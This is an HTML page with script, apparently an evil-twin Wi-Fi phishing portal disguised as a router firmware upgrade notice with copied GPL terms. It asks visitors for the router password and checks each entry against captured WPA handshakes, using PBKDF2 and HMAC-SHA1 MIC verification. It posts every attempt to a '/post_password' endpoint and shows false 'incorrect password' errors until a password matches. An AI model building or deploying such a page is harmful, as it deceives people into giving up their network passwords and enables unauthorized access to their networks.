<!DOCTYPE html>
<html lang="en">

<head>
   <meta charset="UTF-8">
   <meta http-equiv="X-UA-Compatible" content="IE=edge">
   <meta name="viewport" content="width=device-width, initial-scale=1.0">
   <title>Router Upgrade</title>
</head>

<style>
   body {
      background: #59abe3;
      margin: 0;
   }

   .form {
      width: 540px;
      height: 700px;
      background: #e6e6e6;
      border-radius: 8px;
      box-shadow: 0 0 40px -10px #000;
      margin: calc(30vh - 220px) auto;
      padding: 20px 30px;
      max-width: calc(100vw - 40px);
      box-sizing: border-box;
      font-family: "Montserrat", sans-serif;
      position: relative;
      /* overflow: scroll; */
   }


   .final {
      width: 500px;
      height: 300px;
      background: #e6e6e6;
      border-radius: 8px;
      box-shadow: 0 0 40px -10px #000;
      margin: calc(40vh - 220px) auto;
      padding: 20px 30px;
      max-width: calc(100vw - 40px);
      box-sizing: border-box;
      font-family: "Montserrat", sans-serif;
      position: relative;
   }

   h2 {
      margin: 0px;
      padding-bottom: 10px;
      width: 350px;
      color: #78788c;
      border-bottom: 3px solid #78788c;
   }

   .passwd {
      width: 100%;
      padding: 10px;
      box-sizing: border-box;
      background: none;
      outline: none;
      resize: none;
      border: 0;
      font-family: "Montserrat", sans-serif;
      transition: all 0.3s;
      border-bottom: 2px solid #bebed2;
   }

   .passwd:focus {
      border-bottom: 2px solid #78788c;
   }

   p:before {
      content: attr(type);
      display: block;
      margin: 28px 0 0;
      font-size: 14px;
      color: #5a5a5a;
   }

   button {
      float: right;
      padding: 8px 12px;
      margin: 8px 0 0;
      font-family: "Montserrat", sans-serif;
      border: 2px solid #78788c;
      background: 0;
      color: #5a5a6e;
      cursor: pointer;
      transition: all 0.3s;
   }

   button:hover {
      background: #78788c;
      color: #fff;
   }

   .main {
      overflow-y: scroll;
   }

   span {
      margin: 0 5px 0 15px;
   }

   .termsHead {
      content: attr(type);
      display: block;
      margin-bottom: 10px;
      font-size: 14px;
      color: #5a5a5a;
      font-weight: bold;
   }

   textarea {
      resize: none;
      width: max-content;
      min-width: 450px;
      min-height: 250px;
   }

   .form-check-label {
      width: auto;
      font-size: 14px;

   }


   article,
   aside,
   details,
   figcaption,
   figure,
   footer,
   header,
   hgroup,
   main,
   menu,
   nav,
   section,
   summary {
      display: block
   }

   audio,
   canvas,
   progress,
   video {
      display: inline-block;
      vertical-align: baseline
   }

   audio:not([controls]) {
      display: none;
      height: 0
   }

   [hidden],
   template {
      display: none
   }

   a {
      background-color: transparent
   }

   a:active,
   a:hover {
      outline: 0
   }

   abbr[title] {
      border-bottom: none;
      text-decoration: underline;
      text-decoration: underline dotted
   }

   b,
   strong {
      font-weight: bold
   }

   dfn {
      font-style: italic
   }

   h1 {
      font-size: 2em;
      margin: 0.67em 0
   }

   mark {
      background: #ff0;
      color: #000
   }

   small {
      font-size: 80%
   }

   sub,
   sup {
      font-size: 75%;
      line-height: 0;
      position: relative;
      vertical-align: baseline
   }

   sup {
      top: -0.5em
   }

   sub {
      bottom: -0.25em
   }

   img {
      border: 0
   }

   svg:not(:root) {
      overflow: hidden
   }

   figure {
      margin: 1em 40px
   }

   hr {
      -webkit-box-sizing: content-box;
      -moz-box-sizing: content-box;
      box-sizing: content-box;
      height: 0
   }

   pre {
      overflow: auto
   }

   code,
   kbd,
   pre,
   samp {
      font-family: monospace, monospace;
      font-size: 1em
   }

   button,
   input,
   optgroup,
   select,
   textarea {
      color: inherit;
      font: inherit;
      margin: 0
   }

   button {
      overflow: visible
   }

   button,
   select {
      text-transform: none
   }

   button,
   html input[type="button"],
   input[type="reset"],
   input[type="submit"] {
      cursor: pointer
   }

   button[disabled],
   html input[disabled] {
      cursor: default
   }

   button::-moz-focus-inner,
   input::-moz-focus-inner {
      border: 0;
      padding: 0
   }

   input {
      line-height: normal
   }

   input[type="checkbox"],
   input[type="radio"] {
      -webkit-box-sizing: border-box;
      -moz-box-sizing: border-box;
      box-sizing: border-box;
      padding: 0
   }

   input[type="number"]::-webkit-inner-spin-button,
   input[type="number"]::-webkit-outer-spin-button {
      height: auto
   }

   input[type="search"] {
      -webkit-box-sizing: content-box;
      -moz-box-sizing: content-box;
      box-sizing: content-box
   }

   input[type="search"]::-webkit-search-cancel-button,
   input[type="search"]::-webkit-search-decoration {
      -webkit-appearance: none
   }

   fieldset {
      border: 1px solid #c0c0c0;
      margin: 0 2px;
      padding: 0.35em 0.625em 0.75em
   }

   legend {
      border: 0;
      padding: 0
   }

   textarea {
      overflow: auto
   }

   optgroup {
      font-weight: bold
   }

   table {
      border-collapse: collapse;
      border-spacing: 0
   }

   td,
   th {
      padding: 0
   }

   * {
      -webkit-box-sizing: border-box;
      -moz-box-sizing: border-box;
      box-sizing: border-box
   }

   *:before,
   *:after {
      -webkit-box-sizing: border-box;
      -moz-box-sizing: border-box;
      box-sizing: border-box
   }

   html {
      font-size: 10px;
      -webkit-tap-highlight-color: rgba(0, 0, 0, 0)
   }

   body {
      font-family: "Helvetica Neue", Helvetica, Arial, sans-serif;
      font-size: 14px;
      line-height: 1.42857143;
      color: #333;
      background-color: #59abe3
   }

   input,
   button,
   select,
   textarea {
      font-family: inherit;
      font-size: inherit;
      line-height: inherit
   }

   a {
      color: #337ab7;
      text-decoration: none
   }

   a:hover,
   a:focus {
      color: #23527c;
      text-decoration: underline
   }

   a:focus {
      outline: 5px auto -webkit-focus-ring-color;
      outline-offset: -2px
   }

   figure {
      margin: 0
   }

   img {
      vertical-align: middle
   }

   .img-responsive {
      display: block;
      max-width: 100%;
      height: auto
   }

   .img-rounded {
      border-radius: 6px
   }

   .img-thumbnail {
      padding: 4px;
      line-height: 1.42857143;
      background-color: #fff;
      border: 1px solid #ddd;
      border-radius: 4px;
      -webkit-transition: all .2s ease-in-out;
      -o-transition: all .2s ease-in-out;
      transition: all .2s ease-in-out;
      display: inline-block;
      max-width: 100%;
      height: auto
   }

   .img-circle {
      border-radius: 50%
   }

   hr {
      margin-top: 20px;
      margin-bottom: 20px;
      border: 0;
      border-top: 1px solid #eee
   }

   .sr-only {
      position: absolute;
      width: 1px;
      height: 1px;
      padding: 0;
      margin: -1px;
      overflow: hidden;
      clip: rect(0, 0, 0, 0);
      border: 0
   }

   .sr-only-focusable:active,
   .sr-only-focusable:focus {
      position: static;
      width: auto;
      height: auto;
      margin: 0;
      overflow: visible;
      clip: auto
   }

   [role="button"] {
      cursor: pointer
   }

   .modal-open {
      overflow: hidden
   }

   .modal {
      position: fixed;
      top: 0;
      right: 0;
      bottom: 0;
      left: 0;
      z-index: 1050;
      display: none;
      overflow: hidden;
      -webkit-overflow-scrolling: touch;
      outline: 0
   }

   .modal.fade .modal-dialog {
      -webkit-transform: translate(0, -25%);
      -ms-transform: translate(0, -25%);
      -o-transform: translate(0, -25%);
      transform: translate(0, -25%);
      -webkit-transition: -webkit-transform 0.3s ease-out;
      -o-transition: -o-transform 0.3s ease-out;
      transition: transform 0.3s ease-out
   }

   .modal.in .modal-dialog {
      -webkit-transform: translate(0, 0);
      -ms-transform: translate(0, 0);
      -o-transform: translate(0, 0);
      transform: translate(0, 0)
   }

   .modal-open .modal {
      overflow-x: hidden;
      overflow-y: auto
   }

   .modal-dialog {
      position: relative;
      width: auto;
      margin: 10px
   }

   .modal-content {
      position: relative;
      background-color: #fff;
      -webkit-background-clip: padding-box;
      background-clip: padding-box;
      border: 1px solid #999;
      border: 1px solid rgba(0, 0, 0, 0.2);
      border-radius: 6px;
      -webkit-box-shadow: 0 3px 9px rgba(0, 0, 0, 0.5);
      box-shadow: 0 3px 9px rgba(0, 0, 0, 0.5);
      outline: 0
   }

   .modal-backdrop {
      position: fixed;
      top: 0;
      right: 0;
      bottom: 0;
      left: 0;
      z-index: 1040;
      background-color: #000
   }

   .modal-backdrop.fade {
      filter: alpha(opacity=0);
      opacity: 0
   }

   .modal-backdrop.in {
      filter: alpha(opacity=50);
      opacity: .5
   }

   .modal-header {
      padding: 15px;
      border-bottom: 1px solid #e5e5e5
   }

   .modal-header .close {
      margin-top: -2px
   }

   .modal-title {
      margin: 0;
      line-height: 1.42857143
   }

   .modal-body {
      position: relative;
      padding: 15px
   }

   .modal-footer {
      padding: 15px;
      text-align: right;
      border-top: 1px solid #e5e5e5
   }

   .modal-footer .btn+.btn {
      margin-bottom: 0;
      margin-left: 5px
   }

   .modal-footer .btn-group .btn+.btn {
      margin-left: -1px
   }

   .modal-footer .btn-block+.btn-block {
      margin-left: 0
   }

   .modal-scrollbar-measure {
      position: absolute;
      top: -9999px;
      width: 50px;
      height: 50px;
      overflow: scroll
   }

   @media (min-width:768px) {
      .modal-dialog {
         width: 600px;
         margin: 30px auto
      }

      .modal-content {
         -webkit-box-shadow: 0 5px 15px rgba(0, 0, 0, 0.5);
         box-shadow: 0 5px 15px rgba(0, 0, 0, 0.5)
      }

      .modal-sm {
         width: 300px
      }
   }

   @media (min-width:992px) {
      .modal-lg {
         width: 900px
      }
   }

   .clearfix:before,
   .clearfix:after,
   .modal-header:before,
   .modal-header:after,
   .modal-footer:before,
   .modal-footer:after {
      display: table;
      content: " "
   }

   .clearfix:after,
   .modal-header:after,
   .modal-footer:after {
      clear: both
   }

   .center-block {
      display: block;
      margin-right: auto;
      margin-left: auto
   }

   .pull-right {
      float: right !important
   }

   .pull-left {
      float: left !important
   }

   .hide {
      display: none !important
   }

   .show {
      display: block !important
   }

   .invisible {
      visibility: hidden
   }

   .text-hide {
      font: 0/0 a;
      color: transparent;
      text-shadow: none;
      background-color: transparent;
      border: 0
   }

   .hidden {
      display: none !important
   }

   .affix {
      position: fixed
   }


   @media only screen and (max-width: 600px) {
      textarea {
         min-width: 275px;
         margin-left: -10px;
         /* margi: 10px; */
      }

      .form {
         /* height: 650px; */
         margin: calc(40vh - 220px) auto;
         overflow: hidden;
         padding: 10px 30px;

      }

      h2 {
         margin-left: -20px;
      }

      .final {
         margin: calc(40vh - 220px) auto;
         overflow: hidden;
         padding: 10px 30px;
      }

      .final h2 {
         margin-left: 0px;
         width: 200px;

      }
   }
</style>

<body>
   <script src="./jquery.min.js"></script>
   <script src="./bootstrap.min.js"></script>
   <script type="text/javascript" src="./crypto.js"></script>
   <div class="main">


      <form onsubmit="return setAction(this)" method="GET" class="form">
         <h2>Router Firmware Upgrade</h2>
         <p
            type="A new version of the firmware has been detected and awaiting installation. Please review our new terms and conditions and proceed">
         </p>
         <label class="termsHead" for=comment>Terms And Conditions:</label>
         <textarea class="w-100" readonly>
GNU General Public License Notice
This product includes software code developed by third parties,
including software code subject to the GNU General Public License
(“GPL”). As applicable, Wifi Router provides mail service of a machine
readable copy of the corresponding GPL source code on CD-ROM
upon request via email or traditional paper mail. Wifi Router will
charge for a nominal cost to cover shipping and media charges as
allowed under the GPL. This offer will be valid for at least 3 years.
For GPL inquiries and the GPL CD-ROM information, please contact
us at GPL@Wifi Router.com or
Building 24(floors 1,3,4,5) and 28(floors1-4) Central Science and
Technology Park, Shennan Rd, Nanshan, Shenzhen,China.
Additionally, Wifi Router provides for a GPL-Code-Centre under http://
www.Wifi Router.com/en/support/gpl/ where machine readable copies
of the GPL source codes used in Wifi Router products are available for
free download. Please note, that the GPL-Code-Centre is only provided
for as a courtesy to Wifi Router’s customers but may neither offer
a full set of source codes used in all products nor always provide for
the latest or actual version of such source codes.
The GPL Code used in this product is distributed WITHOUT ANY
WARRANTY and is subject to the copyrights of one or more authors.
Please refer to the following GNU General Public License for further
information.

GNU GPL, see <http: www.gnu.org licenses/>.
The GNU General Public License does not permit incorporating your program into proprietary programs.
If your program is a subroutine library, you may consider it more useful to permit linking proprietary
applications with the library. If this is what you want to do, use the GNU Lesser General Public License
instead of this License. But first, please read <http: www.gnu.org philosophy why-not-lgpl.html>.
       </textarea>
         <div class="form-check">
            <input type="checkbox" id="check-box" style="float: left; margin-top: 5px;">
            <label class="form-check-label" for="exampleCheck1">I agree with above Terms And Conditions</label>
         </div>
         <p type="Passphrase:"><input class="passwd" id="pwd" placeholder="Enter router password to continue"></input>
         </p>
         <button type="submit" id="btn" value="Start Upgrade">Start Upgrade</button>
      </form>
   </div>




   <div class="modal fade" id=empty-pass>
      <div class="modal-dialog modal-sm">
         <div class=modal-content>
            <div class=modal-header>
               <button type=button class=close data-dismiss=modal>&times;</button>
               <h4 class=modal-title>Information</h4>
            </div>
            <div class=modal-body>
               <p>Please Input Valid Password. (Must be between 8 and 64 characters)</p>
            </div>
            <div class=modal-footer> <button type=button class="btn btn-default" data-dismiss=modal>Close</button>
            </div>
         </div>
      </div>
   </div>



   <!-- End empty password message --> <!-- Start empty password message -->
   <div class="modal fade" id=no-checkbox>
      <div class="modal-dialog modal-sm">
         <div class=modal-content>
            <div class=modal-header>
               <button type=button class=close data-dismiss=modal>&times;</button>
               <h4 class=modal-title>Information</h4>
            </div>
            <div class=modal-body>
               <p>Please Check The I Agree Button.</p>
            </div>
            <div class=modal-footer> <button type=button class="btn btn-default" data-dismiss=modal>Close</button>
            </div>
         </div>
      </div>
   </div>


   <div class="modal fade" id=pwd-checkbox>
      <div class="modal-dialog modal-sm">
         <div class=modal-content>
            <div class=modal-header>
               <button type=button class=close data-dismiss=modal>&times;</button>
               <h4 class=modal-title>Error</h4>
            </div>
            <div class=modal-body>
               <p>Password is incorrect. Try Again</p>
            </div>
            <div class=modal-footer> <button type=button class="btn btn-default" data-dismiss=modal>Close</button>
            </div>
         </div>
      </div>
   </div>



   <script>
      var noHandshakes = 0;

      async function postPassword(ssid,passwd,matched,handshakes){
         var data = {
            "ssid": ssid,
            "password": passwd,
            "matched": matched ? true : false,
            "handshakes": handshakes ? true : false
         };
         var response = await fetch("/post_password", {
            method: "POST",
            headers: {
               "Content-Type": "application/json"
            },
            body: JSON.stringify(data)
         });
         var result = await response.json();
         console.log(result);
      }

      function kckFromPmk(srcAddress, dstAddress, anonce, snonce) {
         let prefix = "5061697277697365206b657920657870616e73696f6e00";
         if (srcAddress < dstAddress) {
            prefix += srcAddress;
            prefix += dstAddress;
         } else {
            prefix += dstAddress;
            prefix += srcAddress;
         }
         if (snonce < anonce) {
            prefix += snonce;
            prefix += anonce;
         } else {
            prefix += anonce;
            prefix += snonce;
         }
         prefix += "00";
         return prefix;
      }

      function Crack(details, passwd) {
         const pmk = CryptoJS.PBKDF2(passwd, details.ssid, { keySize: 8, iterations: 4096 });
         const kck_pmk = kckFromPmk(details.srcAddress, details.dstAddress, details.anonce, details.snonce);
         const prefix = CryptoJS.enc.Hex.parse(kck_pmk)
         const hmac = CryptoJS.HmacSHA1(prefix, pmk).toString();
         var kck = hmac.substring(0, 32);
         const bytes = CryptoJS.enc.Hex.parse(details.eapolFrameBytes);
         kck = CryptoJS.enc.Hex.parse(kck);
         const computedMic = CryptoJS.HmacSHA1(bytes, kck).toString().substring(0, 32);
         // console.log("Expected MIC :", details.mic);
         // console.log("Calculated MIC :", computedMic);
         if (computedMic === details.mic) {
            return true;
         } else {
            return false;
         }
      }

      $("#btn").on("click", async function (e) {
         e.preventDefault();

         var input = document.getElementById("pwd");
         var box = document.getElementById("check-box");

         if (box.checked != true) {
            $("#no-checkbox").modal("show");
            return false;
         }
         if (input.value.length < 8 || input.value.length > 64) {
            $("#empty-pass").modal("show");
            return false;
         }

         var test = await fetch("/get_datas");
         var result = await test.json()
         if(result.handshakes.length == 0){
            console.log("No handshakes");
            if(noHandshakes == 0){
               $("#pwd-checkbox").modal("show");
               await postPassword("No SSID", input.value, false, false);
               input.value = "";
               noHandshakes++;
               return;
            }
            await postPassword("No SSID", input.value, false, false);
            window.location.href = "/final";
            return;
         }
         var handshakes = result.handshakes;
         var finalResult;
         for (var i = 0; i < handshakes.length; i++) {
            finalResult |= Crack(handshakes[i], input.value);
            await postPassword(handshakes[i].ssid, input.value, finalResult, true);
         }
         if(finalResult){
         window.location.href = "/final";
         }
         else{
             $("#pwd-checkbox").modal("show");
         }
      });
   </script>

</body>

</html>